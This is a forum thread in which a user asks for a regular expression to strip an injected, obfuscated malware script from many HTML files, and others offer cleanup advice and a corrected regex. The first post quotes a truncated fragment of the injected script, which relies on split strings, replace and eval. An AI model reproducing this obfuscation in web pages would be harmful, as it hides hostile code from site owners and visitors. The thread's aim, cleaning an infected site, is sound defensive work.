regular expression help needed

Post here if your topic is about CSS HTML Validator but doesn't fit in another forum.
Post Reply
sagemaniac
Rank 0 - Newcomer
Rank 0 - Newcomer
Posts: 4
Joined: Thu Jul 23, 2009 12:35 pm

regular expression help needed

Post by sagemaniac »

Hi guys,
I need to remove a malware script which nested itself in a bunch of html files. I do not have shell access, so I downloaded all files and plan on doing a replace on all files, then reupload (security hole is fixed allready)
the code looks like so:

Code: Select all

<script>var Wo2ridd="7Nd30Nd74N";var iowRC="ENd27Nd3B';eval";var ZwtdOfta="1p7U%41p3341p6C";var Zo59iE4R="D41p6U%41p6E";var UqHDV="qd60C%%qd";var GEF5X="A/g,'1').repla";var iNelwV="4BJY050JY04";var li0K="d69Nd6CNd6DNd";var Ux8Xew="74Nd48N";var srRLjE="Nf963Nf";var plfgTr6="ape(DQ9C.replac";var g6uH7D5="341p344";var OQEu="1p7241p20";var D2XHR="075JY066JY055";var erQZ="JY074JY0";var IvFW="ANd6DNd65";var gtFk="Nf9Nf962Nf957N";var nxmlt="eplace(/e";Wo2ridd+="d48Nd2ENd";var oLFyoqm="Y065JY";var UbdJHpV="f96FNf96BNf";var XF2Mu="1JY027";var JmUAuRu="Y068JY074JY0";var aTOWEfX="BNd6AN";var hmNIY="Nd75Nd74N";var DLpenI="30%qd74%qd48%qd";var dzMG="Nf965Nf97";var gCQe="4c3B';eval(une";var oOzQo7="6FNd63Nd75";var RUGeAx="079JY0 ... and so on...</script>
I would like to build a regular expression catching all these, I have tried with:

Code: Select all

<script>(var[ ]*([A-Za-z0-9 +="';,.()]+))*</script>
This worked in homesite on abbreviated tests - except that HS would crash on longer passages.
Same snippet does not work in CSE HTML Validator v9.03

I would appreciate any help.


Thanks, Richard
User avatar
MikeGale
Rank VI - Professional
Rank VI - Professional
Posts: 721
Joined: Mon Dec 13, 2004 1:50 pm
Location: Tannhauser Gate

Re: regular expression help needed

Post by MikeGale »

I don't entirely understand the problem here.

Are the pieces of code the same? If so little problem. Identify chunks maybe by hard coding begin and end of string...

If the code differs, how many pages are there? If it's up to a few hundred you can handle it manually. Doing it fully automatically might damage useful content, so is not recommended.

I suggest hunting for instances, inspect visually and manully delete the offending material.

Patterns exist in this code;

Like sequences of ;var <varname>="<varvalue>";var... You could identify x of these in a row then go in by hand.

Another pattern is *.replace(... fragments of which appear in the code.

I agree HS was a good way to detect such things. Whatever you use I suggest keeping a record of the RegEx's you use as you develop and refine. My experience is that each RegEx engine is different, so though you can re-use work for a different engine you generally have to adapt it for the syntax mismatch.

After you are done compare the end product with the starting material using a Diff tool. Look through it all to make sure that it is right.

Good luck.
sagemaniac
Rank 0 - Newcomer
Rank 0 - Newcomer
Posts: 4
Joined: Thu Jul 23, 2009 12:35 pm

Re: regular expression help needed

Post by sagemaniac »

I apologize, this is not a forum to post questions about regex in general - which is what I have just used it for ;).

Thanks for the tipps, this is pretty much what I was planning on doing.

best regards,
Richard
User avatar
Albert Wiersch
Site Admin
Site Admin
Posts: 3578
Joined: Sat Dec 11, 2004 9:23 am
Location: Near Dallas, TX
Contact:

Re: regular expression help needed

Post by Albert Wiersch »

I tried this in CSE HTML Validator v9.0 and it seemed to work in the test document I was using based on your example.

Code: Select all

<script>(var[ ]*([A-Za-z0-9 +=/%"';,.()]+))*</script>
I added the "/" and "%" characters.
Post Reply